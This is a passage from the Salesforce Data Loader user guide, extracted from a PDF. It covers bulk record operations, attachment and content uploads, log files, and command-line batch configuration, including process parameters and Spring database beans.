If your organization restricts IP addresses, logins from untrusted IPs are blocked until they’re activated. Salesforce
automatically sends you an activation email that you can use to log in. The email contains a security token that you must
add to the end of your password. For example, if your password is mypassword, and your security token is XXXXXXXXXX,
you must enter mypasswordXXXXXXXXXX to log in.

4. Choose an object. For example, if you are inserting Account records, select Account. If your object name does not display
in the default list, check Show all objects to see a complete list of the objects that you can access. The objects are
listed by localized label name, with developer name noted in parentheses. For object descriptions, see the Object Reference
for Salesforce and Force.com .

5. Click Browse... to select your CSV file. For example, if you are inserting Account records, you could specify a CSV file
named insertaccounts.csv containing a Name column for the names of the new accounts.

6. Click Next. After the object and CSV file are initialized, click OK.
7. If you are performing an upsert:

a. Your CSV file must contain a column of ID values for matching against existing records. The column may be either
an external ID (a custom field with the “External ID” attribute), or Id (the Salesforce record ID). From the drop-down
list, select which field to use for matching. If the object has no external ID fields, Id is automatically used. Click Next
to continue.
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b. If your file includes the external IDs of an object that has a relationship to your chosen object, enable that external ID
for record matching by selecting its name from the drop-down list. If you make no selection here, you can use the
related object's Id field for matching by mapping it in the next step. Click Next to continue.

8. Define how the columns in your CSV file map to Salesforce fields. Click Choose an Existing Map to select an existing
field mapping, or click Create or Edit a Map to create a new map or modify an existing map. For more details and an
example of usage, see Defining Field Mappings on page 496.

9. Click Next.
10. For every operation, the Data Loader generates two unique CSV log files; one file name starts with “success,” while the

other starts with “error.” Click Browse... to specify a directory for these files.
11. Click Finish to perform the operation, and then click Yes to confirm.
12. As the operation proceeds, a progress information window reports the status of the data movement.
13. After the operation completes, a confirmation window summarizes your results. Click View Successes to view your success

file, click View Errors to open your errors file, or click OK  to close. For more information, see Reviewing Output Files
on page 501.

Tip:

• If you are updating or deleting large amounts of data, review Performing Mass Updates and Performing Mass
Deletes for tips and best practices.

• There is a five-minute limit to process 100 records when the Bulk API is enabled. Also, if it takes longer than 10
minutes to process a file, the Bulk API places the remainder of the file back in the queue for later processing. If
the Bulk API continues to exceed the 10-minute limit on subsequent attempts, the file is placed back in the queue
and reprocessed up to 10 times before the operation is permanently marked as failed. Even if the processing failed,
some records could have completed successfully, so you must check the results. If you get a timeout error when
loading a file, split your file into smaller files, and try again.

Performing Mass Updates

Available in: Enterprise, Unlimited, Developer, and Database.com Editions

To update a large number of records at one time, we recommend the following steps:

1. Obtain your data by performing an export of the objects you wish to update, or by running a report. Make sure your report
includes the record ID.

2. As a backup measure, save an extra copy of the generated CSV file.
3. Open your working file in a CSV editor such as Excel, and update your data.
4. Launch Data Loader and follow the update wizard. Note that matching is done according to record ID. See Inserting,

Updating, or Deleting Data Using Data Loader on page 497.
5. After the operation, review your success and error log files. See Reviewing Output Files on page 501.
6. If you made a mistake, use the backup file to update the records to their previous values.
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Performing Mass Deletes

Available in: Enterprise, Unlimited, Developer, and Database.com Editions

To delete a large number of records at one time using Data Loader, we recommend the following steps:

1. As a backup measure, export the records you wish to delete, being sure to select all fields. (See Exporting Data on page
495.) Save an extra copy of the generated CSV file.

2. Next, export the records you wish to delete, this time using only the record ID as the desired criterion.
3. Launch the Data Loader and follow the delete or hard delete wizard. Map only the ID column. See Inserting, Updating,

or Deleting Data Using Data Loader on page 497.
4. After the operation, review your success and error log files. See Reviewing Output Files on page 501.

Uploading Attachments
You can use Data Loader to upload attachments to Salesforce. Before uploading attachments, note the following:

• If you intend to upload via the Bulk API, verify that Upload Bulk API Batch as Zip File on the Settings >
Settings page is enabled.

• If you are migrating attachments from a source Salesforce organization to a target Salesforce organization, begin by
requesting a data export for the source organization. On the Schedule Export page, make sure to select the Include
Attachments... checkbox, which causes the file Attachment.csv to be included in your export. You can use this
CSV file to upload the attachments. For more information on the export service, see Exporting Backup Data on page 552.

To upload attachments:

1. Confirm that the CSV file you intend to use for attachment importing contains the following required columns (each
column represents a Salesforce field):

• ParentId - the Salesforce ID of the parent record.
• Name - the name of the attachment file, such as myattachment.jpg.
• Body - the absolute path to the attachment on your local drive.

Ensure that the values in the Body column contain the full file name of the attachments as they exist on your computer.
For example, if an attachment named myattachment.jpg is located on your computer at C:\Export, Body must
specify C:\Export\myattachment.jpg. Your CSV file might look like this:

ParentId,Name,Body
50030000000VDowAAG,attachment1.jpg,C:\Export\attachment1.gif
701300000000iNHAAY,attachment2.doc,C:\Export\files\attachment2.doc

The CSV file can also include other optional Attachment fields, such as Description.

2. Proceed with an insert or upsert operation; see Inserting, Updating, or Deleting Data Using Data Loader on page 497. At
the Select data objects step, make sure to select the Show all Salesforce objects checkbox and the
Attachment object name in the list.
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Uploading Content with the Data Loader
Available in: Enterprise, Unlimited, and Developer Editions

You can use Data Loader to bulk upload documents and links into libraries in Salesforce CRM Content. Before uploading
documents or links, note the following:

• If you intend to upload via the Bulk API, verify that Upload Bulk API Batch as Zip File on the Settings >
Settings page is enabled.

• When you upload a document from your local drive using Data Loader, you must specify the actual path in the
VersionData and PathOnClient fields in the CSV file. VersionData identifies the location and extracts the format
and PathOnClient identifies the type of document being uploaded.

• When you upload a link using the Data Loader, you must specify the URL in ContentUrl. Do not use PathOnClient
or VersionData to upload links.

• You can't export content using the Data Loader.

1. Create a CSV file with the following fields:

• Title - file name.
• Description - (optional) file or link description.

Note:  If there are commas in the description, use double quotes around the text.

• VersionData - complete file path on your local drive (for uploading documents only).

Note:  Files are converted to base64 encoding on upload. This adds approximately 30% to the file size.

• PathOnClient - complete file path on your local drive (for uploading documents only).
• ContentUrl - URL (for uploading links only).
• OwnerId - (optional) file owner, defaults to the user uploading the file.
• FirstPublishLocationId - library ID.
• RecordTypeId - content type ID.

Note:  If you publish to a library that has restricted content types, you must specify RecordTypeId.

To determine the RecordTypeId values for your organization using Data Loader, follow the steps in Exporting Data.
Your SOQL query might look like this:

Select Id, Name FROM RecordType WHERE SobjectType = 'ContentVersion'

To determine the RecordTypeId values for your organization using the AJAX Toolkit:

a. Log in to Salesforce.
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b. Enter this URL in your browser:
http://instanceName.salesforce.com/soap/ajax/28.0/debugshell.html. Enter the instanceName,
such as na1, for your organization. You can see the instanceName in the URL field of your browser after logging
in to Salesforce.

c. In the AJAX Toolkit Shell page type:

sforce.connection.describeSObject("ContentVersion")

d. Press Enter.
e. Click on the arrows for recordTypeInfos.

All of the RecordTypeId values for your organization are listed.

• TagsCsv - (optional) tag.

A sample CSV file is:

Title,Description,VersionData,PathOnClient,OwnerId,FirstPublishLocationId,RecordTypeId,TagsCsv
testfile,"This is a test file, use for bulk
upload",c:\files\testfile.pdf,c:\files\testfile.pdf,005000000000000,058700000004Cd0,012300000008o2sAQG,one

2. Upload the CSV file for the ContentVersion object; see Inserting, Updating, or Deleting Data Using Data Loader on page
497. All documents and links will be available in the specified library.

Reviewing Output Files
Available in: Enterprise, Unlimited, Developer, and Database.com Editions

After every import or export, Data Loader generates two CSV output files that contain the results of the operation. One file
name starts with “success,” while the other starts with “error.” During every export, Data Loader saves the extracted data to a
CSV file that you specify in the wizard. Data Loader has a built-in CSV file viewer with which you can open and view these
files.

To view output files from a Data Loader operation:

1. Choose View > View CSV.
2. Specify the number of rows to view. Each row in the CSV file corresponds to one Salesforce record. The default is 1000.
3. To view a CSV file of your choice, click Open CSV. To view the last success file, click Open Success. To view the last

error file, click Open Error. The CSV file opens in a new window.
4. Optionally, click Open in External Program to open the file in the associated external program, such as Microsoft® Office

Excel.

The “success” file contains all of the records that were successfully loaded. In this file, there's a column for the newly
generated record IDs. The “error” file contains all of the records that were rejected from the load operation. In this file,
there's a column that describes why the load failed.

5. Click Close to return to the CSV Chooser window, and then click OK to exit the window.
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Note:  To generate success files when exporting data, select the Generate status files for exports setting.
For more information, see Configuring Data Loader on page 488.

Troubleshooting Data Loader Operations
Available in: Enterprise, Unlimited, Developer, and Database.com Editions

If you need to investigate a problem with Data Loader, or if requested by salesforce.com Customer Support, you can access
log files that track the operations and network connections made by Data Loader. The two log files are:

sdl.log

Contains a detailed chronological list of Data Loader log entries. Log entries marked “INFO” are procedural items, such
as logging in to Salesforce. Log entries marked “ERROR” are problems such as a submitted record missing a required
field.

sdl_out.log

A supplemental log that contains additional information not captured in sdl.log. For example, it includes log entries for
the creation of proxy server network connections.

These files can be opened with commonly available text editor programs, such as Microsoft Notepad.

You can quickly open these files by entering %TEMP%\sdl.log and %TEMP%\sdl_out.log in either the Run dialog or
the Windows Explorer address bar.

If you are having login issues from the command line, ensure that the password provided in the configuration parameters is
encrypted. If you are having login issues from the UI, you may need to obtain a new security token.

RUN BATCH PROCESSES

Running in Batch Mode
Available in: Enterprise, Unlimited, Developer, and Database.com Editions

You can run Data Loader in batch mode from the command line. See the following topics:

• Understanding Installed Directories and Files

• Encrypting From the Command Line

• Upgrading Your Batch Mode Interface

• Using the Command Line Interface

• Configuring Batch Processes

• Data Loader Process Configuration Parameters

502

Troubleshooting Data Loader OperationsData Loader



• Data Loader Command Line Operations

• Configuring Database Access

• Mapping Columns

• Running Individual Batch Processes

• Data Access Objects

Note:  If you have used the batch mode from the command line with a version earlier than 8.0, see Upgrading Your
Batch Mode Interface on page 504.

Understanding Installed Directories and Files
Available in: Enterprise, Unlimited, Developer, and Database.com Editions

In versions 8.0 and later, installing the Data Loader creates several directories under the installation directory. The following
directories are involved in running the program from the command line for automated batch processing:

bin

Contains the batch files encrypt.bat for encrypting passwords and process.bat for running batch processes.

For information on running the Data Loader from the command line, see Using the Command Line Interface on page
505.

conf

The default configuration directory. Contains the configuration files config.properties, Loader.class, and
log-conf.xml.

The config.properties file that is generated when you modify the Settings dialog in the graphical user interface is
located at C:\Documents and Settings\your Windows username\Application
Data\salesforce.com\Data Loader version_number. You can copy this file to the conf installation directory
to use it for batch processes.

samples

Contains subdirectories of sample files for reference.

File Path Convention

The file paths provided in these topics start one level below the installation directory. For example, \bin means C:\Program
Files \salesforce.com\Data Loader version_number\bin, provided you accepted the default installation directory.
If you installed the program to a different location, please substitute that directory path as appropriate.

Encrypting From the Command Line
Available in: Enterprise, Unlimited, Developer, and Database.com Editions

When running Data Loader in batch mode from the command line, you must encrypt the following configuration parameters:
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• sfdc.password

• sfdc.proxyPassword

Use the utility described below to perform encryption.

Using the Encryption Utility

Data Loader offers an encryption utility to secure passwords specified in configuration files. This utility is used to encrypt
passwords, but data that you transmit using Data Loader is not encrypted.

1. Run \bin\encrypt.bat.
2. At the command line, follow the prompts provided to execute the following actions:

Generate a key
Key text is generated on screen from the text you provide. Carefully copy the key text to a key file, omitting any
leading or trailing spaces. The key file can then be used for encryption and decryption.

Encrypt text
Generates an encrypted version of a password or other text. Optionally, you can provide a key file for the encryption.
In the configuration file, make sure that the encrypted text is copied precisely and the key file is mentioned.

Verify encrypted text
Given encrypted and decrypted versions of a password, verifies whether the encrypted password provided matches
its decrypted version. A success or failure message is printed to the command line.

Upgrading Your Batch Mode Interface
Available in: Enterprise, Unlimited, Developer, and Database.com Editions

The batch mode interface in Data Loader versions 8.0 and later aren’t backwards-compatible with earlier versions. If you’re
using a version earlier than 8.0 to run batch processes, your options are as follows:

Maintain the old version for batch use

Do not uninstall your old version of Data Loader. Continue to use that version for batch processes. You can’t take
advantage of newer features such as database connectivity, but your integrations will continue to work. Optionally, install
the new version alongside the old version and dedicate the old version solely to batch processes.

Generate a new config.properties file from the new GUI

If you originally generated your config.properties file from the graphical user interface, use the new version to set
the same properties and generate a new file. Use this new file with the new batch mode interface. For more information,
see Using the Command Line Interface on page 505.

Manually update your config.properties file

If your old config.properties file was created manually, then you must manually update it for the new version. For
more information, see Understanding Installed Directories and Files on page 503.
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Using the Command Line Interface
Available in: Enterprise, Unlimited, Developer, and Database.com Editions

For automated batch operations such as nightly scheduled loads and extractions, run Data Loader from the command line.
Before running any batch operation, be sure to include your encrypted password in the configuration file. For more information,
see Introduction on page 521 and Encrypting From the Command Line on page 503. From the command line, navigate to the
bin directory and type process.bat, which takes the following parameters:

• The directory containing config.properties.

• The name of the batch process bean contained in process-conf.xml.

For more information about using process.bat, see Running Individual Batch Processes on page 521.

To view tips and instructions, add -help to the command contained in process.bat.

Data Loader runs whatever operation, file, or map is specified in the configuration file that you specify. If you do not specify
a configuration directory, the current directory is used. By default, Data Loader configuration files are installed at the following
location:

C:\Program Files\salesforce.com\Data Loader version number\conf

You use the process-conf.xml file to configure batch processing. Set the name of the process in the bean element's id
attribute: (for example <bean id="myProcessName">).

If you want to implement enhanced logging, use a copy of log-conf.xml.

You can change parameters at runtime by giving param=value as program arguments. For example, adding
process.operation=insert to the command changes the configuration at runtime.

You can set the minimum and maximum heap size. For example, -Xms256m -Xmx256m sets the heap size to 256 MB.

Note:  These topics only apply to Data Loader version 8.0 and later.

Tip:

If you experience login issues in the command line interface after upgrading to a new version of Data Loader, please
try re-encrypting your password to solve the problem. For information on the password encryption utility, see
Encrypting From the Command Line on page 503.

Configuring Batch Processes
Available in: Enterprise, Unlimited, Developer, and Database.com Editions

Use \samples\conf\process-conf.xml to configure your Data Loader processes, which are represented by ProcessRunner
beans. A process should have ProcessRunner as the class attribute and the following properties set in the configuration
file:
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name

Sets the name of the ProcessRunner bean. This value is also used as the non-generic thread name and for configuration
backing files (see below).

configOverrideMap

A property of type map where each entry represents a configuration setting: the key is the setting name; the value is the
setting value.

enableLastRunOutput

If set to true (the default), output files containing information about the last run, such as
sendAccountsFile_lastrun.properties, are generated and saved to the location specified by
lastRunOutputDirectory. If set to false, the files are not generated or saved.

lastRunOutputDirectory

The directory location where output files containing information about the last run, such as
sendAccountsFile_lastrun.properties, are written. The default value is \conf. If enableLastRunOutput
is set to false, this value is not used because the files are not generated.

The configuration backing file stores configuration parameter values from the last run for debugging purposes, and is used to
load default configuration parameters in config.properties. The settings in configOverrideMap take precedence over
those in the configuration backing file. The configuration backing file is managed programmatically and does not require any
manual edits.

For the names and descriptions of available process configuration parameters, see Data Loader Process Configuration Parameters
on page 506.

Data Loader Process Configuration Parameters
Available in: Enterprise, Unlimited, Developer, and Database.com Editions

When running Data Loader from the command line, you can specify the following configuration parameters in the
process-conf.xml file. In some cases, the parameter is also represented in the graphical user interface at Settings > Settings.

Tip:  A sample process-conf.xml file can be found in the \samples directory that's installed with Data Loader.

DescriptionEquivalent
Option in
Settings
Dialog

Data
Type

Parameter Name

Select this option to force files to open in UTF-8
encoding, even if they were saved in a different
format.

Sample value: true

Read all
CSVs with
UTF-8
encodingbooleandataAccess.readUTF8
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DescriptionEquivalent
Option in
Settings
Dialog

Data
Type

Parameter Name

Select this option to force files to be written in
UTF-8 encoding.

Sample value: true

Write all
CSVs with
UTF-8
encodingbooleandataAccess.writeUTF8

Name of the data source to use, such as a CSV
file name. For databases, use the name of the
database configuration in database-conf.xml.

Sample value:
c:\dataloader\data\extractLead.csv

Not
applicable
(N/A)stringdataAccess.name

Number of records read from the database at a
time. The maximum value is 200.

Sample value: 50N/AintegerdataAccess.readBatchSize

Standard or custom data source type. Standard
types are csvWriter, csvRead,
databaseWrite, and databaseRead.

Sample value: csvWriteN/AstringdataAccess.type

Number of records written to the database at a
time. The maximum value is 2,000. Note the

N/AintegerdataAccess.writeBatchSize

implication for a large parameter value: if an error
occurs, all records in the batch are rolled back. In
contrast, if the value is set to 1, each record is
processed individually (not in batch) and errors
are specific to a given record. We recommend
setting the value to 1 when you need to diagnose
problems with writing to a database.

Sample value: 500

Select this option to generate success and error
files when exporting data.

Sample value: true

Generate
status
files for
exportsbooleanprocess.enableExtractSuccessOutput

When running Data Loader in batch mode, you
can disable the generation of output files such as

N/Abooleanprocess.enableLastRunOutput

sendAccountsFile_lastRun.properties.
Files of this type are saved by default to the conf
directory. To stop the writing of these files, set
this option to false.
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DescriptionEquivalent
Option in
Settings
Dialog

Data
Type

Parameter Name

Alternatively, you can change the location of the
directory where these files are saved, using
process.lastRunOutputDirectory.

Sample value: true

Name of the file that contains the encryption key.
See Encrypting From the Command Line on
page 503.

Sample value: c:\dataloader\conf\my.keyN/A

string
(file
name)process.encryptionKeyFile

The initial setting for the
process.lastRunDate parameter, which can

N/Adateprocess.initialLastRunDate

be used in a SQL string and is automatically
updated when a process has run successfully. For
an explanation of the date format syntax, see Date
Formats on page 493.

Format must be
yyyy-MM-ddTHH:mm:ss.SSS+/-HHmm. For
example: 2006-04-13T13:50:32.423-0700

When running Data Loader in batch mode, you
can change the location where output files such

N/A
string
(directory)process.lastRunOutputDirectory

as
sendAccountsFile_lastRun.properties
are written. Files of this type are saved by default
to the \conf directory. To change the location,
change the value of this option to the full path
where the output files should be written.

Alternatively, you can stop the files from being
written, using
process.enableLastRunOutput.

If your last operation failed, you can use this
setting to begin where the last successful
operation finished.

Sample value: 1008
Start at
rownumberprocess.loadRowToStartAt

Name of the field mapping file to use. See
Mapping Columns on page 519.

Sample value:
c:\dataloader\conf\accountExtractMap.sdlN/A

string
(file
name)process.mappingFile
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DescriptionEquivalent
Option in
Settings
Dialog

Data
Type

Parameter Name

The operation to perform. See Data Loader
Command Line Operations on page 514.

Sample value: extractN/Astringprocess.operation

The directory where “success” and “error” output
files are saved. The file names are automatically

N/A
string
(directory)process.statusOutputDirectory

generated for each operation unless you specify
otherwise in process-conf.xml.

Sample value: c:\dataloader\status

The name of the CSV file that stores error data
from the last operation.

Sample value:
c:\dataloader\status\myProcessErrors.csvN/A

string
(file
name)process.outputError

The name of the CSV file that stores success data
from the last operation. See also

N/A

string
(file
name)process.outputSuccess

process.enableExtractSuccessOutput
on page 507.

Sample value:
c:\dataloader\status\myProcessSuccesses.csv

Select this option to support the date formats
dd/MM/yyyy and dd/MM/yyyy HH:mm:ss.

Sample value: true

Use
European
date
formatbooleanprocess.useEuropeanDates

Specify the ID of the assignment rule to use for
inserts, updates, and upserts. This option applies

Assignment
rulestringsfdc.assignmentRule

to inserts, updates, and upserts on cases and leads.
It also applies to updates on accounts if your
organization has territory assignment rules on
accounts. The assignment rule overrides Owner
values in your CSV file.

Sample value: 03Mc00000026J7w

The number of milliseconds to wait between
successive checks to determine if the asynchronous

N/Aintegersfdc.bulkApiCheckStatusInterval

Bulk API operation is complete or how many
records have been processed. See also
sfdc.useBulkApi. We recommend a value of
5000.

Sample value: 5000
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DescriptionEquivalent
Option in
Settings
Dialog

Data
Type

Parameter Name

Select this option to use serial instead of parallel
processing for Bulk API. Processing in parallel

Enable
serial

booleansfdc.bulkApiSerialMode

can cause database contention. When this is

mode for
Bulk API

severe, the load may fail. Using serial mode
guarantees that batches are processed one at a
time. Note that using this option may significantly
increase the processing time for a load. See also
sfdc.useBulkApi.

Sample value: false

Select this option to use Bulk API to upload zip
files containing binary attachments, such as

Upload
Bulk API

booleansfdc.bulkApiZipContent

Attachment records or Salesforce CRM Content.
See also sfdc.useBulkApi.

Sample value: true
Batch as
Zip File

The number of seconds to wait for a connection
during API calls.

Sample value: 60N/Aintegersfdc.connectionTimeoutSecs

If true, enables SOAP message debugging. By
default, messages are sent to STDOUT unless

N/Abooleansfdc.debugMessages

you specify an alternate location in
sfdc.debugMessagesFile.

Sample value: false

See
process.enableExtractSuccessOutput

N/A

string
(file
name)sfdc.debugMessagesFile

on page 507. Stores SOAP messages sent to or
from Salesforce. As messages are sent or received,
they are appended to the end of the file. As the
file does not have a size limit, please monitor your
available disk storage appropriately.

Sample value:
\lexiloader\status\sfdcSoapTrace.log

If true, enables repeated attempts to connect to
Salesforce servers. See sfdc.maxRetries on

N/Abooleansfdc.enableRetries

page 512 and sfdc.minRetrySleepSecs on
page 512.

Sample value: true
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DescriptionEquivalent
Option in
Settings
Dialog

Data
Type

Parameter Name

Enter the URL of the Salesforce server with
which you want to communicate. For example,

Server
hostURLsfdc.endpoint

if you are loading data into a sandbox, change the
URL to https://test.salesforce.com.

Sample production value:
https://login.salesforce.com/services/Soap/u/28.0

The Salesforce object used in the operation.

Sample value: LeadN/Astringsfdc.entity

Used in upsert operations; specifies the custom
field with the “External ID” attribute that is used
as a unique identifier for data matching.

Sample value: LegacySKU__cN/Astringsfdc.externalIdField

In a single export or query operation, records are
returned from Salesforce in increments of this

Query
request
sizeintegersfdc.extractionRequestSize

size. The maximum value is 2,000 records. Larger
values may improve performance but use more
memory on the client.

Sample value: 500

The SOQL query for the data export.

Sample value: SELECT Id, LastName,
FirstName, Rating, AnnualRevenue,
OwnerId FROM LeadN/Astringsfdc.extractionSOQL

Select this option to insert blank mapped values
as null values during data operations. Note that

Insert
null
valuesbooleansfdc.insertNulls

when you are updating records, this option
instructs Data Loader to overwrite any existing
data in mapped fields.

Sample value: false

In a single insert, update, upsert, or delete
operation, records moving to or from Salesforce

Batch
sizeintegersfdc.loadBatchSize

are processed in increments of this size. The
maximum value is 200. We recommend a value
between 50 and 100.

Sample value: 100
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DescriptionEquivalent
Option in
Settings
Dialog

Data
Type

Parameter Name

The maximum number of repeated attempts to
connect to Salesforce. See
sfdc.enableRetries on page 510.

Sample value: 3N/Aintegersfdc.maxRetries

The minimum number of seconds to wait
between connection retries. The wait time

N/Aintegersfdc.minRetrySleepSecs

increases with each try. See
sfdc.enableRetries on page 510.

Sample value: 2

Compression enhances the performance of Data
Loader and is turned on by default. You may want

Compressionbooleansfdc.noCompression

to disable compression if you need to debug the
underlying SOAP messages. To turn off
compression, enable this option.

Sample value: false

An encrypted Salesforce password that
corresponds to the username provided in

N/A
encrypted
stringsfdc.password

sfdc.username. See also Encrypting From the
Command Line on page 503.

Sample value: 4285b36161c65a22

The host name of the proxy server, if applicable.

Sample value:
http://myproxy.internal.company.com

Proxy
hostURLsfdc.proxyHost

An encrypted password that corresponds to the
proxy username provided in

Proxy
password

encrypted
stringsfdc.proxyPassword

sfdc.proxyUsername. See also Encrypting
From the Command Line on page 503.

Sample value: 4285b36161c65a22

The proxy server port.

Sample value: 8000
Proxy
portintegersfdc.proxyPort

The username for proxy server authentication.

Sample value: jane.doe
Proxy
usernamestringsfdc.proxyUsername

By default, Salesforce resets the URL after login
to the one specified in sfdc.endpoint. To turn

Reset URL
on Loginbooleansfdc.resetUrlOnLogin
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DescriptionEquivalent
Option in
Settings
Dialog

Data
Type

Parameter Name

off this automatic reset, disable this option by
setting it to false.

Valid values: true (default), false

Specify how many seconds Data Loader waits to
receive a response back from the server before
returning an error for the request.

Sample value: 540Timeoutintegersfdc.timeoutSecs

If a date value does not include a time zone, this
value is used.

Time Zonestringsfdc.timezone

• If no value is specified, the time zone of the
computer where Data Loader is installed is
used.

• If an incorrect value is entered, GMT is used
as the time zone and this fact is noted in the
Data Loader log.

Valid values are any time zone identifier which
can be passed to the Java
getTimeZone(java.lang.String) method.
The value can be a full name such as
America/Los_Angeles, or a custom ID such
as GMT-8:00.

You can retrieve the default value by running the
TimeZone.getDefault() method in Java.
This value is the time zone on the computer
where Data Loader is installed.

Select this option to truncate data in the following
types of fields when loading that data into

Allow
field
truncationbooleansfdc.truncateFields

Salesforce: Email, Multi-select Picklist, Phone,
Picklist, Text, and Text (Encrypted).

In Data Loader versions 14.0 and earlier, values
for fields of those types are truncated by Data
Loader if they are too large. In Data Loader
version 15.0 and later, the load operation fails if
a value is specified that is too large.

Selecting this option allows you to specify that
the previous behavior, truncation, be used instead
of the new behavior in Data Loader versions 15.0

513

Data Loader Process Configuration ParametersImport Your Data

http://download.oracle.com/javase/6/docs/api/java/util/TimeZone.html#getTimeZone(java.lang.String)


DescriptionEquivalent
Option in
Settings
Dialog

Data
Type

Parameter Name

and later. This option is selected by default and
has no effect in versions 14.0 and earlier.

This option is not available if the Use Bulk
API option is selected. In that case, the load
operation fails for the row if a value is specified
that is too large for the field.

Sample value: true

Select this option to use the Bulk API to insert,
update, upsert, delete, and hard delete records.

Use Bulk
APIbooleansfdc.useBulkApi

The Bulk API is optimized to load or delete a
large number of records asynchronously. It’s faster
than the default SOAP-based API due to parallel
processing and fewer network round-trips. See
also sfdc.bulkApiSerialMode.

Sample value: true

Salesforce username. See sfdc.password.

Sample value: jdoe@mycompany.comN/Astringsfdc.username

Data Loader Command Line Operations
Available in: Enterprise, Unlimited, Developer, and Database.com Editions

When running Data Loader in batch mode from the command line, several operations are supported. An operation represents
the flow of data between Salesforce and an external data source such as a CSV file or a database. See the following list of
operation names and descriptions.

Extract

Uses a Salesforce Object Query Language to export a set of records from Salesforce, then writes the exported data to a
data source. Soft-deleted records are not included.

Extract All

Uses a Salesforce Object Query Language to export a set of records from Salesforce, including both existing and soft-deleted
records, then writes the exported data to a data source.

Insert

Loads data from a data source into Salesforce as new records.
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Update

Loads data from a data source into Salesforce, where existing records with matching ID fields are updated.

Upsert

Loads data from a data source into Salesforce, where existing records with a matching custom external ID field are
updated; records without matches are inserted as new records.

Delete

Loads data from a data source into Salesforce, where existing records with matching ID fields are deleted.

Hard Delete

Loads data from a data source into Salesforce, where existing records with matching ID fields are deleted without being
stored first in the Recycle Bin.

Configuring Database Access
Available in: Enterprise, Unlimited, Developer, and Database.com Editions

When you run Data Loader in batch mode from the command line, use \samples\conf\database-conf.xml to configure
database access objects, which you use to extract data directly from a database.

DatabaseConfig Bean

The top-level database configuration object is the DatabaseConfig bean, which has the following properties:

sqlConfig
The SQL configuration bean for the data access object that interacts with a database.

dataSource
The bean that acts as database driver and authenticator. It must refer to an implementation of javax.sql.DataSource
such as org.apache.commons.dbcp.BasicDataSource.

The following code is an example of a DatabaseConfig bean:

<bean id="AccountInsert"
class="com.salesforce.dataloader.dao.database.DatabaseConfig"
singleton="true">
<property name="sqlConfig" ref="accountInsertSql"/>

</bean>

DataSource

The DataSource bean sets the physical information needed for database connections. It contains the following properties:

driverClassName
The fully qualified name of the implementation of a JDBC driver.

url
The string for physically connecting to the database.
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username
The username for logging in to the database.

password
The password for logging in to the database.

Depending on your implementation, additional information may be required. For example, use
org.apache.commons.dbcp.BasicDataSource when database connections are pooled.

The following code is an example of a DataSource bean:

<bean id="oracleRepDataSource"
class="org.apache.commons.dbcp.BasicDataSource"
destroy-method="close">
<property name="driverClassName" value="oracle.jdbc.driver.OracleDriver"/>
<property name="url" value="jdbc:oracle:thin:@myserver.salesforce.com:1521:TEST"/>
<property name="username" value="test"/>
<property name="password" value="test"/>

</bean>

Versions of Data Loader from API version 25.0 onwards do not come with an Oracle JDBC driver. Using Data Loader to
connect to an Oracle data source without a JDBC driver installed will result in a “Cannot load JDBC driver class” error. To
add the Oracle JDBC driver to Data Loader:

• Download the latest JDBC driver from
http://www.oracle.com/technetwork/database/features/jdbc/index-091264.html.

• Copy the JDBC .jar file to data loader install folder/java/bin.

See Also:
Spring Framework Overview
Data Access Objects
SQL Configuration

Spring Framework Overview

Available in: Enterprise, Unlimited, Developer, and Database.com Editions

The Data Loader configuration files are based on the Spring Framework, which is an open source full-stack Java/J2EE
application framework.

The Spring Framework allows you to use XML files to configure beans. Each bean represents an instance of an object; the
parameters correspond to each object's setter methods. A typical bean has the following attributes:

id

Uniquely identifies the bean to XmlBeanFactory, which is the class that gets objects from an XML configuration file.

class

Specifies the implementation class for the bean instance.
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For more information on the Spring Framework, see the official documentation and the support forums. Note that salesforce.com
cannot guarantee the availability or accuracy of external websites.

See Also:
Configuring Database Access

Data Access Objects

Available in: Enterprise, Unlimited, Developer, and Database.com Editions

When running Data Loader in batch mode from the command line, several data access objects are supported. A data access
object allows access to an external data source outside of Salesforce. They can implement a read interface (DataReader), a
write interface (DataWriter), or both. See the following list of object names and descriptions.

csvRead

Allows the reading of a comma or tab-delimited file. There should be a header row at the top of the file that describes
each column.

csvWrite

Allows writing to a comma-delimited file. A header row is added to the top of the file based on the column list provided
by the caller.

databaseRead

Allows the reading of a database. Use database-conf.xml to configure database access.

databaseWrite

Allows writing to a database. Use database-conf.xml to configure database access.

See Also:
Configuring Database Access

SQL Configuration

Available in: Enterprise, Unlimited, Developer, and Database.com Editions

When running Data Loader in batch mode from the command line, the SqlConfig class contains configuration parameters
for accessing specific data in the database. As shown in the code samples below, queries and inserts are different but very
similar. The bean must be of type com.salesforce.dataloader.dao.database.SqlConfig and have the following
properties:
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sqlString

The SQL code to be used by the data access object.

The SQL can contain replacement parameters that make the string dependent on configuration or operation variables.
Replacement parameters must be delimited on both sides by “@” characters. For example, @process.lastRunDate@.

sqlParams

A property of type map that contains descriptions of the replacement parameters specified in sqlString. Each entry
represents one replacement parameter: the key is the replacement parameter's name, the value is the fully qualified Java
type to be used when the parameter is set on the SQL statement. Note that “java.sql” types are sometimes required, such
as java.sql.Date instead of java.util.Date. For more information, see the official JDBC API documentation.

columnNames

Used when queries (SELECT statements) return a JDBC ResultSet. Contains column names for the data outputted
by executing the SQL. The column names are used to access and return the output to the caller of the DataReader
interface.

SQL Query Bean Example

<bean id="accountMasterSql"
class="com.salesforce.dataloader.dao.database.SqlConfig"
singleton="true">
<property name="sqlString"/>

<value>
SELECT distinct

'012x00000000Ij7' recordTypeId,
accounts.account_number,
org.organization_name,
concat (concat(parties.address1, ' '), parties.address2) billing_address,
locs.city,
locs.postal_code,
locs.state,
locs.country,
parties.sic_code

from
ar.hz_cust_accounts accounts,
ar.hz_organization_profiles org,
ar.hz_parties parties,
ar.hz_party_sites party_sites,
ar.hz_locations locs

where
accounts.PARTY_ID = org.PARTY_ID
and parties.PARTY_ID = accounts.PARTY_ID
and party_sites.PARTY_ID = accounts.PARTY_ID
and locs.LOCATION_ID = party_sites.LOCATION_ID
and (locs.last_update_date > @process.lastRunDate@ OR

accounts.last_update_date > @process.lastRunDate@
</value>

</property>
<property name="columNames">

<list>
<value>recordTypeId</value>
<value>account_number</value>
<value>organization_name</value>
<value>billing_address</value>
<value>city</value>
<value>postal_code</value>
<value>state</value>
<value>country</value>
<value>sic_code</value>
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</list>
</property>
<property name="sqlParams">

<map>
<entry key="process.lastRunDate" value="java.sql.Date"/>

</map>
</property>

</bean>

SQL Insert Bean Example

<bean id="partiesInsertSql"
class="com.salesforce.dataloader.dao.database.SqlConfig"
singleton="true">
<property name="sqlString"/>

<value>
INSERT INTO REP.INT_PARTIES (
